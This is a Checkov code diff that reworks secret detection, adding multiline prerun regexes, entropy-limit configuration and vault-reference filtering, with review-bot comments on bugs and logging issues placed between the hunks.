@@ -1,193 +0,0 @@ -from __future__ import annotations - -import asyncio -import json -import logging -import os -import time -from collections.abc import Iterable, Sequence, Collection -from pathlib import Path -from typing import Dict, Any, List - -import requests - -from checkov.common.bridgecrew.platform_integration import bc_integration -from checkov.common.bridgecrew.platform_key import bridgecrew_dir -from checkov.common.bridgecrew.vulnerability_scanning.image_scanner import image_scanner, TWISTCLI_FILE_NAME -from checkov.common.bridgecrew.vulnerability_scanning.integrations.docker_image_scanning import \ - docker_image_scanning_integration -from checkov.common.util.file_utils import compress_file_gzip_base64, decompress_file_gzip_base64 -from checkov.common.util.http_utils import request_wrapper - -from checkov.common.util.tqdm_utils import ProgressBar - -SLEEP_DURATION = 2 -MAX_SLEEP_DURATION = 60 - - -class Scanner: - def __init__(self, pbar: ProgressBar | None = None, root_folder: str | Path | None = None) -> None: - self._base_url = bc_integration.api_url - if pbar: - self.pbar = pbar - else: - self.pbar = ProgressBar('') - self.pbar.turn_off_progress_bar() - self.root_folder = root_folder - - @staticmethod - def should_rescan_for_result(scan_result: dict[str, Any] | None) -> bool: - return scan_result is None or scan_result.get("packages") is None - - def scan(self, input_paths: Collection[Path]) -> Sequence[dict[str, Any]] | None: - self.pbar.initiate(len(input_paths)) - scan_results = asyncio.run( - self.run_scan_multi(input_paths=input_paths) - ) - self.pbar.close() - return scan_results - - async def run_scan_multi( - self, - input_paths: "Iterable[Path]", - ) -> "Sequence[Dict[str, Any]] | None": - - if os.getenv("PYCHARM_HOSTED") == "1": - # PYCHARM_HOSTED env variable equals 1 when running via Pycharm. 
- # it avoids us from crashing, which happens when using multiprocessing via Pycharm's debug-mode - logging.warning("Running the scans in sequence for avoiding crashing when running via Pycharm") - scan_results: list[dict[str, Any] | None] = [] - for input_path in input_paths: - scan_results.append(await self.run_scan(input_path)) - else: - scan_results = await asyncio.gather(*[self.run_scan(i) for i in input_paths]) - - if any(self.should_rescan_for_result(scan_result) for scan_result in scan_results): - status: bool = image_scanner.setup_twistcli() - - if not status: - return None - if os.getenv("PYCHARM_HOSTED") == "1": - # PYCHARM_HOSTED env variable equals 1 when running via Pycharm. - # it avoids us from crashing, which happens when using multiprocessing via Pycharm's debug-mode - logging.warning("Running the scans in sequence for avoiding crashing when running via Pycharm") - scan_results = [ - await self.execute_twistcli_scan(input_path) if self.should_rescan_for_result(scan_results[idx]) - else scan_results[idx] for idx, input_path in enumerate(input_paths) - ] - else: - input_paths_as_list: List[Path] = list(input_paths) # create a list from a set ("Iterable") - indices_to_fix: List[int] = [ - idx - for idx in range(len(input_paths_as_list)) - if self.should_rescan_for_result(scan_results[idx]) - ] - new_scan_results = await asyncio.gather(*[ - self.execute_twistcli_scan(input_paths_as_list[idx]) for idx in indices_to_fix - ]) - for idx in indices_to_fix: - res = new_scan_results.pop(0) - res['repository'] = str(input_paths_as_list[idx]) - scan_results[idx] = res - - # checking whether there are None results that indicates for error. 
id there is any, we return None - scan_results_without_nones: list[dict[str, Any]] = [] - for result in scan_results: - if result is None: - return None - else: - scan_results_without_nones.append(result) - - return scan_results_without_nones - - async def run_scan(self, input_path: Path) -> dict[str, Any] | None: - try: - self.pbar.set_additional_data({'Current File Scanned': os.path.relpath(input_path, self.root_folder)}) - logging.info(f"Start to scan package file {input_path}") - - request_body = { - "compressedFileBody": compress_file_gzip_base64(str(input_path)), - "compressionMethod": "gzip", - "fileName": input_path.name - } - - response = request_wrapper( - "POST", f"{self._base_url}/api/v1/vulnerabilities/scan", - headers=bc_integration.get_default_headers("POST"), - json=request_body, - should_call_raise_for_status=True - ) - - response_json = response.json() - - if response_json["status"] == "already_exist": - logging.info(f"result for {input_path} exists in the cache") - return self.parse_api_result(input_path, response_json["outputData"]) - - return self.run_scan_busy_wait(input_path, response_json['id']) - except Exception: - logging.debug( - "[sca_package] - Unexpected failure happened during package scanning.\n" - "the scanning is terminating. details are below.\n" - "please try again. 
if it is repeated, please report.", exc_info=True) - return None - - def run_scan_busy_wait(self, input_path: Path, scan_id: str) -> dict[str, Any]: - current_state = "Empty" - desired_state = "Result" - total_sleeping_time = 0 - response = requests.Response() - - while current_state != desired_state: - response = request_wrapper( - "GET", f"{self._base_url}/api/v1/vulnerabilities/scan-results/{scan_id}", - headers=bc_integration.get_default_headers("GET") - ) - response_json = response.json() - current_state = response_json["outputType"] - - if current_state == "Error": - logging.error(response_json["outputData"]) - return {} - - if total_sleeping_time > MAX_SLEEP_DURATION: - logging.info(f"Timeout, slept for {total_sleeping_time}") - return {} - - time.sleep(SLEEP_DURATION) - total_sleeping_time += SLEEP_DURATION - - return self.parse_api_result(input_path, response.json()["outputData"]) - - def parse_api_result(self, origin_file_path: Path, response: str) -> dict[str, Any]: - raw_result: dict[str, Any] = json.loads(decompress_file_gzip_base64(response)) - raw_result['repository'] = str(origin_file_path) - self.pbar.update() - return raw_result - - async def execute_twistcli_scan( - self, - input_path: Path, - ) -> Dict[str, Any]: - output_path = Path(f'results-{input_path.name}.json') - - command = f"{Path(bridgecrew_dir) / TWISTCLI_FILE_NAME} coderepo scan --address {docker_image_scanning_integration.get_proxy_address()} --token {docker_image_scanning_integration.get_bc_api_key()} --details --output-file \"{output_path}\" {input_path}" - process = await asyncio.create_subprocess_shell( - command, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE - ) - - stdout, stderr = await process.communicate() - - # log output for debugging - logging.debug(stdout.decode()) - - exit_code = await process.wait() - - if exit_code: - logging.error(stderr.decode()) - return {} - - # read the report file - scan_result: Dict[str, Any] = 
json.loads(output_path.read_text())
- output_path.unlink()
- return scan_result
diff --git a/checkov/sca_package_2/output.py b/checkov/sca_package_2/output.py
index 4cfe23a09db..ba05eccc482 100644
--- a/checkov/sca_package_2/output.py
+++ b/checkov/sca_package_2/output.py
@@ -2,6 +2,7 @@
 import itertools
 import logging
+import sys
 from collections import defaultdict
 from dataclasses import dataclass
 from typing import List, Union, Dict, Any
@@ -229,7 +230,6 @@ def create_cli_license_violations_table(file_path: str,
 "Package version",
 "Policy ID",
 "License",
- "Status",
 ]
 for package_idx, (_, license_statuses) in enumerate(package_licenses_details_map.items()):
 if package_idx > 0:
@@ -248,8 +248,7 @@ def create_cli_license_violations_table(file_path: str,
 col_package_name,
 col_package_version,
 license_status["policy"],
- license_status["license"],
- license_status["status"],
+ license_status["license"]
 ]
 package_table.add_row(curr_row)
@@ -280,15 +279,20 @@ def create_cli_cves_table(file_path: str, cve_count: CveCount, package_details_m
 lines_details_found: bool) -> str:
 columns = 7
 table_width = 159
+ fixed_line_with = 159
 column_width = int(table_width / columns)
+ # on python 3.12 and above, the columns are smaller, need to make them wider in order to have consistency.
+ if sys.version_info >= (3, 12):
+ table_width = 165
+
 cve_table_lines = create_cve_summary_table_part(
 table_width=table_width, column_width=column_width, cve_count=cve_count
 )
 vulnerable_packages = True if package_details_map else False
 fixable_table_lines = create_fixable_cve_summary_table_part(
- table_width=table_width, column_count=columns, cve_count=cve_count, vulnerable_packages=vulnerable_packages
+ table_width=fixed_line_with, column_count=columns, cve_count=cve_count, vulnerable_packages=vulnerable_packages
 )
 package_table_lines = create_package_overview_table_part(
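Review bot: `fixed_line_with` on the new side of the create_cli_cves_table hunk reads as a typo for `fixed_line_width`, and since it is the only name distinguishing the fixable-summary width from the now version-dependent `table_width`, the intent of keeping that row at 159 is lost; renaming it and adding `# the fixable summary row keeps the pre-3.12 width so it lines up with the rows above` would carry that intent. `column_width` is derived from `table_width` before the 3.12 override raises `table_width` to 165, so the summary and package tables are now asked for a width that no longer equals `columns * column_width`; if that is deliberate it deserves a comment next to the override, otherwise compute `column_width` after it. The version check compensates for a PrettyTable rendering difference rather than a Python language change, so a comment naming the library behaviour being worked around (not visible from here) would help whoever later removes the branch. create_cli_cves_table continues outside the hunk.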
diff --git a/checkov/secrets/local_secrets_runner.py b/checkov/secrets/local_secrets_runner.py
new file mode 100644
index 00000000000..a0d493b58e1
--- /dev/null
+++ b/checkov/secrets/local_secrets_runner.py
@@ -0,0 +1,43 @@
+# flake8: noqa
+# type: ignore
+
+import json
+import os
+
+from checkov.main import secrets_runner
+from checkov.common.runners.runner_registry import RunnerRegistry
+from checkov.runner_filter import RunnerFilter
+from checkov.common.bridgecrew.platform_integration import bc_integration
+
+
+with open(os.environ['LOCAL_SECRETS_POLICIES_JSON']) as secrets_policies_file:
+ default_regexes = json.load(secrets_policies_file)
+bc_integration.customer_run_config_response = {'secretsPolicies': default_regexes}
+
+
+def execute():
+ runner = secrets_runner(entropy_limit=4)
+ # 20 min less in order to finish processing, else put checkov's default (12h - 1200)
+ runner_registry = RunnerRegistry(
+ '',
+ RunnerFilter(
+ block_list_secret_scan=[],
+ enable_secret_scan_all_files=True,
+ enable_git_history_secret_scan=False,
+ git_history_last_commit_scanned=None,
+ git_history_timeout="checkov_timeout_str",
+ checks=['BC_GIT_79']
+ ),
+ runner
+ )
+
+ scan_reports = runner_registry.run(
+ root_folder=os.environ["LOCAL_SCANNING_FOLDER"],
+ external_checks_dir=list(),
+ collect_skip_comments=True)
+
+ print(scan_reports)
+
+
+if __name__ == "__main__":
+ execute()
diff --git a/checkov/secrets/plugins/custom_regex_detector.py b/checkov/secrets/plugins/custom_regex_detector.py
index b444dc977ce..eedd829b7dc 100644
--- a/checkov/secrets/plugins/custom_regex_detector.py
+++ b/checkov/secrets/plugins/custom_regex_detector.py
@@ -2,6 +2,7 @@
 import logging
 from typing import Set, Any, Generator, Pattern, Optional, Dict, Tuple, TYPE_CHECKING, cast
+from collections import defaultdict
 from detect_secrets.constants import VerifiedResult
 from detect_secrets.core.potential_secret import PotentialSecret
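Review bot: The comment `# 20 min less in order to finish processing, else put checkov's default (12h - 1200)` in local_secrets_runner.py does not describe the line it sits above, where `git_history_timeout="checkov_timeout_str"` is a literal placeholder string rather than a timeout value, and that argument is only meaningful when `enable_git_history_secret_scan=True`, which is False here; either pass the intended value or drop both the comment and the argument. The module reads `LOCAL_SECRETS_POLICIES_JSON` and assigns `bc_integration.customer_run_config_response` at import time, so importing it anywhere else raises KeyError when the variable is unset and mutates global integration state as a side effect; moving the load into `execute()` or a small `_load_policies()` helper keeps the script importable and testable. `print(scan_reports)` emits the report objects' repr rather than any of the registry's output formats, which together with `# flake8: noqa` / `# type: ignore` suggests a local debugging entry point — a module docstring saying so, and which two environment variables it requires, would make that explicit.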
@@ -29,16 +30,24 @@ def __init__(self) -> None:
 self.regex_to_metadata: dict[str, dict[str, Any]] = dict()
 self.denylist = set()
 self.multiline_deny_list = set()
+ self.multiline_pattern_by_prerun_compiled: dict[str, Pattern[str]] = dict()
 self.multiline_regex_to_metadata: dict[str, dict[str, Any]] = dict()
 self._analyzed_files: Set[str] = set()
+ self._analyzed_files_by_check: Dict[str, Set[str]] = defaultdict(lambda: set())
 self._multiline_regex_supported_file_types: Set[str] = set()
 detectors = load_detectors()
 for detector in detectors:
 try:
 if detector.get("isMultiline"):
+ # If prerun exists, we will add it as 'regular detector' (special treat in analyze_line)
+ if detector.get("prerun"):
+ self.denylist.add(re.compile('{}'.format(detector["prerun"])))
+ self.regex_to_metadata[detector["prerun"]] = detector
+ self.multiline_pattern_by_prerun_compiled[detector["prerun"]] = re.compile('{}'.format(detector["Regex"]))
+ else:
+ self.multiline_deny_list.add(re.compile('{}'.format(detector["Regex"])))
+ self.multiline_regex_to_metadata[detector["Regex"]] = detector
 continue
 self.denylist.add(re.compile('{}'.format(detector["Regex"])))
 self.regex_to_metadata[detector["Regex"]] = detector
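Review bot: Two detectors that share the same `prerun` expression overwrite each other in `self.regex_to_metadata[detector["prerun"]]` and `self.multiline_pattern_by_prerun_compiled[detector["prerun"]]`, so only the last one's `Regex` and `Check_ID` survive and the others are silently never evaluated; if a prerun is meant to be a cheap shared prefix across policy variants, these maps need a list per prerun (or a key that includes `Check_ID`) rather than a single slot. `defaultdict(lambda: set())` is simply `defaultdict(set)`, and `re.compile('{}'.format(x))` is `re.compile(x)` — the `.format` wrapper adds nothing for a str and would mask a TypeError if a non-string value ever arrived from `load_detectors()`. The new attribute deserves a comment explaining the two-stage design, e.g. `# prerun regex -> compiled full multiline regex: the prerun is matched per line, the full pattern over the whole file (see _find_potential_secret)`. The `try` body that wraps the loop continues past the hunk.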
@@ -86,11 +95,14 @@ def analyze_line(
 if filename not in self._analyzed_files:
 self._analyzed_files.add(filename)
 # We only want to read file if: there is regex supporting it & file size is not over MAX_FILE_SIZE
+ # Notice: in the find potential secret we check per multiline regex if we should run it according the filetype.
+ # This is only a validation to reduce file content reading in case it not supported at all
 if not self.multiline_regex_to_metadata.values() or \
 not self.multiline_regex_supported_file_types or \
 not any([filename.endswith(str(file_type)) for file_type in self.multiline_regex_supported_file_types]) or \
 not 0 < get_file_size_safe(filename) < CustomRegexDetector.MAX_FILE_SIZE:
 return output
+
 file_content = read_file_safe(filename)
 if not file_content:
 return output
@@ -138,6 +150,40 @@ def _find_potential_secret( except Exception: is_verified = False regex_data = current_regex_to_metadata[regex.pattern] + + # It's a multiline regex (only the prerun executed). We should execute the whole multiline pattern + # We want to run multiline policy once per file (if prerun was found) + if regex_data.get("prerun"): + if filename in self._analyzed_files_by_check[regex_data['Check_ID']]: + continue + self._analyzed_files_by_check[regex_data['Check_ID']].add(filename) + + # We are going to scan the whole file with the multiline regex + if not 0 < get_file_size_safe(filename) < CustomRegexDetector.MAX_FILE_SIZE: + continue + file_content = read_file_safe(filename) + if not file_content: + continue + multiline_regex = self.multiline_pattern_by_prerun_compiled.get(regex.pattern) + if multiline_regex is None: + continue + multiline_matches = multiline_regex.findall(file_content) + for mm in multiline_matches: + mm = f"'{mm}'" + ps = PotentialSecret( + type=regex_data["Name"], + filename=filename, + secret=mm, + line_number=line_number, + is_verified=is_verified, + is_added=is_added, + is_removed=is_removed, + is_multiline=True, + ) + ps.check_id = regex_data["Check_ID"] + output.add(ps) + continue + # Wrap multiline match with fstring + '' match = f"'{match}'" if is_multiline else match ps = PotentialSecret( diff --git a/checkov/secrets/plugins/detector_utils.py b/checkov/secrets/plugins/detector_utils.py index 0c632869444..3bed63d0778 100644 --- a/checkov/secrets/plugins/detector_utils.py +++ b/checkov/secrets/plugins/detector_utils.py @@ -26,6 +26,8 @@ MAX_KEYWORD_LIMIT = 500 +B64_FP_REGEX = re.compile(r'\b[A-Za-z]+_+[A-Za-z_]*[A-Za-z]\b') + DENY_LIST_REGEX = r'|'.join(DENYLIST) # Support for suffix after keyword i.e. password_secure = "value" DENY_LIST_REGEX2 = r'({denylist}){suffix}'.format( 
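Review bot: `multiline_regex.findall(file_content)` returns capture-group contents (or tuples of them) instead of the full match whenever the policy's multiline `Regex` contains a group, so `mm = f"'{mm}'"` would record a fragment or a stringified tuple as the secret, and `secret_hash` would change accordingly. Switching to `finditer` fixes that and also the second problem here, that every multiline match is attributed to the prerun's `line_number` rather than to where it actually sits in the file: `for m in multiline_regex.finditer(file_content):`, `mm = f"'{m.group(0)}'"`, `line_number=file_content.count("\n", 0, m.start()) + 1`. `_analyzed_files_by_check` only ever grows, which is fine for a single run but deserves a comment if the detector instance is reused across runs. `_find_potential_secret` starts and ends outside this hunk.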
@@ -186,20 +188,33 @@ def remove_fp_secrets_in_keys(detected_secrets: set[PotentialSecret], line: str, for detected_secret in detected_secrets: if not detected_secret.secret_value: continue + processed_line = get_processed_line(formatted_line, detected_secret.secret_value) # Found keyword prefix as potential secret - if formatted_line.startswith(detected_secret.secret_value): + if processed_line.startswith(detected_secret.secret_value): secrets_to_remove.add(detected_secret) # found a function name at the end of the line - if formatted_line and FUNCTION_CALL_AFTER_KEYWORD_REGEX.search(formatted_line): + if processed_line and FUNCTION_CALL_AFTER_KEYWORD_REGEX.search(processed_line): secrets_to_remove.add(detected_secret) # secret value is substring of keywork - if is_code_file and FOLLOWED_BY_EQUAL_VALUE_KEYWORD_REGEX.search(formatted_line): + if is_code_file and FOLLOWED_BY_EQUAL_VALUE_KEYWORD_REGEX.search(processed_line): key, value = line.split("=", 1) if detected_secret.secret_value in key and detected_secret.secret_value in value: secrets_to_remove.add(detected_secret) + # strings which are all lower/upper case letters are suspected to not be base64 high entropy strings + # the 2nd part of the end is to make test_non_multiline_pair_time_limit_creating_report pass + if B64_FP_REGEX.search(detected_secret.secret_value) and "SECRET" not in detected_secret.secret_value: + secrets_to_remove.add(detected_secret) detected_secrets -= secrets_to_remove +def get_processed_line(formatted_line: str, secret_value: str) -> str: + if not formatted_line.startswith(secret_value) and formatted_line.find(":", + formatted_line.rfind(secret_value) + len( + secret_value)) > -1: + return formatted_line[formatted_line.find(secret_value):] + return formatted_line + + def format_reducing_noise_secret(string: str) -> str: return json.dumps(string) 
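Review bot: The new `B64_FP_REGEX.search(detected_secret.secret_value)` filter drops a candidate as soon as any letters-and-underscore word occurs somewhere inside it (`\b` also fires at `-`, `.` or a space), so a value such as `prod_db-8f3Kq9ZtL2` is discarded although the interesting part is the second half; `B64_FP_REGEX.fullmatch(...)` expresses what the comment says ("strings which are all ... letters") without that side effect, and would likely remove the need for the `"SECRET" not in ...` exemption, which the comment itself attributes to making one test pass rather than to detection logic. Separately, `get_processed_line` tests for a `:` after the last occurrence of the secret (`rfind`) but then slices from the first occurrence (`find`), so the two disagree when the value appears twice in the line; use the same index in both places. If this function is also reached for non-entropy detectors (its callers are outside the hunk), the base64 heuristic should be gated on the plugin that produced the secret, as the comment implies.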
diff --git a/checkov/secrets/plugins/entropy_keyword_combinator.py b/checkov/secrets/plugins/entropy_keyword_combinator.py index b542897b52d..02aeb568095 100644 --- a/checkov/secrets/plugins/entropy_keyword_combinator.py +++ b/checkov/secrets/plugins/entropy_keyword_combinator.py @@ -1,6 +1,7 @@ from __future__ import annotations import re +import os from typing import Generator, Set, Tuple from typing import Any from typing import TYPE_CHECKING @@ -29,7 +30,7 @@ MAX_LINE_LENGTH = 10000 MAX_KEYWORD_LIMIT = 500 -ENTROPY_KEYWORD_COMBINATOR_LIMIT = 3 +ENTROPY_KEYWORD_COMBINATOR_LIMIT = float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3')) ENTROPY_KEYWORD_LIMIT = 4.8 DENY_LIST_REGEX = r'|'.join(DENYLIST) @@ -118,10 +119,18 @@ class EntropyKeywordCombinator(BasePlugin): secret_type = "" # nosec # noqa: CCE003 # a static attribute - def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH) -> None: - iac_limit = ENTROPY_KEYWORD_COMBINATOR_LIMIT - self.high_entropy_scanners_iac = (Base64HighEntropyString(limit=iac_limit), HexHighEntropyString(limit=iac_limit)) - self.entropy_scanners_non_iac_with_keyword = (Base64HighEntropyString(limit=iac_limit + 0.3), HexHighEntropyString(limit=iac_limit + 0.3)) + def __init__(self, limit: float = ENTROPY_KEYWORD_LIMIT, max_line_length: int = MAX_LINE_LENGTH, + entropy_limit: float = ENTROPY_KEYWORD_COMBINATOR_LIMIT) -> None: + self.entropy_limit = entropy_limit + self.high_entropy_scanners_iac = ( + Base64HighEntropyString( + limit=entropy_limit), HexHighEntropyString( + limit=entropy_limit)) + self.entropy_scanners_non_iac_with_keyword = ( + Base64HighEntropyString( + limit=entropy_limit + 0.3), + HexHighEntropyString( + limit=entropy_limit + 0.3)) self.high_entropy_scanners = (Base64HighEntropyString(limit=limit), HexHighEntropyString(limit=limit)) self.keyword_scanner = KeywordDetector() self.max_line_length = max_line_length 
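Review bot: `ENTROPY_KEYWORD_COMBINATOR_LIMIT = float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3'))` runs at import time, so a malformed value (for example `CHECKOV_ENTROPY_KEYWORD_LIMIT=low`) raises `ValueError` while the plugin module is being loaded, far from any message that names the variable, and a large value silently disables the entropy detector for a whole CI run. Parse it in a small helper that logs and falls back to `3` on `ValueError`, and document the operational effect next to the constant, e.g. `# Raising this lowers recall of CKV_SECRET_6/19 for the whole run; keep changes to it auditable in CI config.` The same variable is parsed a second time in `Runner.__init__` in `runner.py` in this diff, so one shared helper would keep the two defaults from drifting.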
diff --git a/checkov/secrets/plugins/load_detectors.py b/checkov/secrets/plugins/load_detectors.py index 6915672979b..6391d61671f 100644 --- a/checkov/secrets/plugins/load_detectors.py +++ b/checkov/secrets/plugins/load_detectors.py @@ -32,7 +32,7 @@ def modify_secrets_policy_to_detectors(policies_list: List[dict[str, Any]]) -> L return secrets_list -def add_to_custom_detectors(custom_detectors: List[Dict[str, Any]], name: str, check_id: str, regex: str, +def add_to_custom_detectors(custom_detectors: List[Dict[str, Any]], name: str, check_id: str, regex: str, prerun: str, is_custom: str, is_multiline: bool = False, supported_files: Optional[List[str]] = None) -> None: custom_detectors.append({ 'Name': name, @@ -40,7 +40,8 @@ def add_to_custom_detectors(custom_detectors: List[Dict[str, Any]], name: str, c 'Regex': regex, 'isCustom': is_custom, 'isMultiline': is_multiline, - 'supportedFiles': supported_files if supported_files else [] + 'supportedFiles': supported_files if supported_files else [], + 'prerun': prerun }) @@ -54,7 +55,7 @@ def add_detectors_from_condition_query(custom_detectors: List[Dict[str, Any]], c value = [value] for regex in value: parsed = True - add_to_custom_detectors(custom_detectors, secret_policy['title'], check_id, regex, + add_to_custom_detectors(custom_detectors, secret_policy['title'], check_id, regex, "", secret_policy['isCustom']) return parsed @@ -77,6 +78,8 @@ def add_detectors_from_code(custom_detectors: List[Dict[str, Any]], code: str, s secret_policy['title'], check_id, regex, + # Only one prerun per multiline regex + code_dict['definition'].get('prerun', [''])[0], secret_policy['isCustom'], code_dict['definition'].get("multiline", False), code_dict['definition'].get("supported_files", []) diff --git a/checkov/secrets/runner.py b/checkov/secrets/runner.py index 1dc5dea5f28..b9bcd216383 100644 --- a/checkov/secrets/runner.py +++ b/checkov/secrets/runner.py 
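Review bot: `code_dict['definition'].get('prerun', [''])[0]` assumes `prerun` is a non-empty list: a policy that sets `prerun: []` raises `IndexError`, and one that sets it to a plain string yields only its first character as the prerun pattern, which would then be compiled and run against every line. Normalising first is cheap: `prerun = code_dict['definition'].get('prerun') or ['']` followed by `prerun[0] if isinstance(prerun, list) else str(prerun)`. These definitions appear to arrive from the platform's `secretsPolicies` response rather than from the repository under scan, so a guard here protects the whole scan from a single malformed policy. `add_detectors_from_code` starts and continues outside this hunk.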
@@ -1,7 +1,6 @@ from __future__ import annotations import datetime -import hashlib import linecache import logging import os @@ -21,6 +20,7 @@ from checkov.common.util.http_utils import request_wrapper, DEFAULT_TIMEOUT from detect_secrets import SecretsCollection from detect_secrets.core import scan +from detect_secrets.core.potential_secret import PotentialSecret from detect_secrets.settings import transient_settings from checkov.common.bridgecrew.check_type import CheckType @@ -47,7 +47,6 @@ if TYPE_CHECKING: from checkov.common.util.tqdm_utils import ProgressBar - from detect_secrets.core.potential_secret import PotentialSecret SOURCE_CODE_EXTENSION = ['.py', '.js', '.properties', '.pem', '.php', '.xml', '.ts', '.env', '.java', '.rb', 'go', 'cs', '.txt'] @@ -73,7 +72,8 @@ 'Hex High Entropy String': 'CKV_SECRET_19' } -ENTROPY_CHECK_IDS = ('CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80') +ENTROPY_CHECK_IDS = {'CKV_SECRET_6', 'CKV_SECRET_19', 'CKV_SECRET_80'} +GENERIC_PRIVATE_KEY_CHECK_IDS = {'CKV_SECRET_10', 'CKV_SECRET_13', 'CKV_SECRET_192'} CHECK_ID_TO_SECRET_TYPE = {v: k for k, v in SECRET_TYPE_TO_ID.items()} 
@@ -81,13 +81,22 @@ MAX_FILE_SIZE = int(os.getenv('CHECKOV_MAX_FILE_SIZE', '5000000')) # 5 MB is default limit +def should_filter_vault_secret(secret_value: str, check_id: str) -> bool: + return 'vault:' in secret_value.lower() and check_id in ENTROPY_CHECK_IDS + + class Runner(BaseRunner[None, None, None]): check_type = CheckType.SECRETS # noqa: CCE003 # a static attribute - def __init__(self, file_extensions: Iterable[str] | None = None, file_names: Iterable[str] | None = None): + def __init__( + self, + file_extensions: Iterable[str] | None = None, + file_names: Iterable[str] | None = None, + entropy_limit: Optional[float] = None): super().__init__(file_extensions, file_names) self.secrets_coordinator = SecretsCoordinator() self.history_secret_store = GitHistorySecretStore() + self.entropy_limit = entropy_limit or float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3')) def set_history_secret_store(self, value: Dict[str, List[EnrichedPotentialSecret]]) -> None: self.history_secret_store.secrets_by_file_value_type = value @@ -121,7 +130,8 @@ def run( {'name': 'SquareOAuthDetector'}, {'name': 'StripeDetector'}, {'name': 'TwilioKeyDetector'}, - {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py'} + {'name': 'EntropyKeywordCombinator', 'path': f'file://{current_dir}/plugins/entropy_keyword_combinator.py', + 'entropy_limit': self.entropy_limit} ] # load runnable plugins 
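Review bot: `should_filter_vault_secret` uses `'vault:' in secret_value.lower()`, a substring test, so any high-entropy value that merely contains `vault:` somewhere is dropped from the entropy checks; a real credential can be hidden from the scanner by appending that token, whereas a genuine vault reference starts with it. Prefer `secret_value.strip("'\"").lower().startswith('vault:')` and say in a docstring which reference syntax is being recognised. In `Runner.__init__`, `entropy_limit or float(...)` treats an explicit `0.0` as unset because it is falsy; `self.entropy_limit = entropy_limit if entropy_limit is not None else float(os.getenv('CHECKOV_ENTROPY_KEYWORD_LIMIT', '3'))` keeps the fallback for `None` only.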
@@ -138,7 +148,8 @@ def run( policies_list = customer_run_config.get('secretsPolicies', []) suppressions = customer_run_config.get('suppressions', []) if suppressions: - secret_suppressions_id = [suppression['policyId'] for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy'] + secret_suppressions_id = [suppression['policyId'] + for suppression in suppressions if suppression['suppressionType'] == 'SecretsPolicy'] if policies_list: runnable_plugins: dict[str, str] = get_runnable_plugins(policies_list) logging.info(f"Found {len(runnable_plugins)} runnable plugins") @@ -188,8 +199,10 @@ def run( if enable_secret_scan_all_files: # 'excluded_paths' shouldn't include the static paths from 'EXCLUDED_PATHS' # they are separately referenced inside the 'filter_excluded_paths' function - filter_excluded_paths(root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths) - filter_excluded_paths(root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths) + filter_excluded_paths( + root_dir=root, names=d_names, excluded_paths=runner_filter.excluded_paths) + filter_excluded_paths( + root_dir=root, names=f_names, excluded_paths=runner_filter.excluded_paths) else: filter_ignored_paths(root, d_names, excluded_paths) filter_ignored_paths(root, f_names, excluded_paths) @@ -198,7 +211,7 @@ def run( if is_dockerfile(file): if 'dockerfile' not in block_list_secret_scan_lower: files_to_scan.append(os.path.join(root, file)) - elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower: + elif f".{file.split('.')[-1]}" not in block_list_secret_scan_lower and file not in block_list_secret_scan_lower: files_to_scan.append(os.path.join(root, file)) elif file not in PROHIBITED_FILES and f".{file.split('.')[-1]}" in SUPPORTED_FILE_EXTENSIONS or is_dockerfile( file): 
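Review bot: The new `file not in block_list_secret_scan_lower` clause compares the file name as-is, while the list's name suggests its entries were lowercased, so entries such as `dockerfile` or `.env` would not match `Dockerfile` or `.ENV` here (the list is built outside this hunk, so please confirm). If it is lowercased, compare `file.lower() not in block_list_secret_scan_lower`, and the extension clause beside it has the same issue. Note also that `f".{file.split('.')[-1]}"` turns an extensionless name such as `Makefile` into `.Makefile`, so such files could never be blocked by extension; the new name clause now gives a way to block them, which is worth a comment. `run` continues outside this hunk.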
@@ -214,7 +227,17 @@ def run( self.pbar.close() secret_records: dict[str, SecretsRecord] = {} + secrets_in_uuid_form = ['CKV_SECRET_116'] for key, secret in secrets: + check_id = secret.check_id if secret.check_id else SECRET_TYPE_TO_ID.get(secret.type) + if not check_id: + logging.debug(f'Secret was filtered - no check_id for line_number {secret.line_number}') + continue + if secret.secret_value and should_filter_vault_secret(secret.secret_value, check_id): + logging.debug(f'Secret was filtered - this is a vault reference: {secret.secret_value}') + continue + secret_key = f'{key}_{secret.line_number}_{secret.secret_hash}' + # secret history added_commit_hash, removed_commit_hash, code_line, added_by, removed_date, added_date = '', '', '', '', '', '' if runner_filter.enable_git_history_secret_scan: enriched_potential_secret = git_history_scanner.\ 
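Review bot: `logging.debug(f'Secret was filtered - this is a vault reference: {secret.secret_value}')` writes the candidate value itself to the log; because `should_filter_vault_secret` only checks that `vault:` appears somewhere in the value, the filtered string can still be a real credential, and the rest of this loop deliberately logs `PotentialSecret.hash_secret(...)` instead. Log the hash here as well: `logging.debug(f'Secret was filtered - vault reference: {PotentialSecret.hash_secret(secret.secret_value)}')`. `secrets_in_uuid_form = ['CKV_SECRET_116']` would read better as a module-level set beside `ENTROPY_CHECK_IDS`, with a comment naming the detector that emits UUID-shaped values by design. The enclosing `run` method continues outside this hunk.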
@@ -225,19 +248,18 @@ def run( added_by = enriched_potential_secret.get('added_by') or '' removed_date = enriched_potential_secret.get('removed_date') or '' added_date = enriched_potential_secret.get('added_date') or '' - check_id = secret.check_id if secret.check_id else SECRET_TYPE_TO_ID.get(secret.type) - if not check_id: - logging.debug(f'Secret was filtered - no check_id for line_number {secret.line_number}') - continue - secret_key = f'{key}_{secret.line_number}_{secret.secret_hash}' - if secret.secret_value and is_potential_uuid(secret.secret_value): + # run over secret key + if isinstance(secret.secret_value, str) and secret.secret_value: + stripped = secret.secret_value.strip(',";\'') + if stripped != secret.secret_value: + secret_key = f'{key}_{secret.line_number}_{PotentialSecret.hash_secret(stripped)}' + if secret.secret_value and is_potential_uuid(secret.secret_value) and secret.check_id not in secrets_in_uuid_form: logging.info( - f"Removing secret due to UUID filtering: {hashlib.sha256(secret.secret_value.encode('utf-8')).hexdigest()}") + f"Removing secret due to UUID filtering: {PotentialSecret.hash_secret(secret.secret_value)}") continue if secret_key in secret_records.keys(): - if 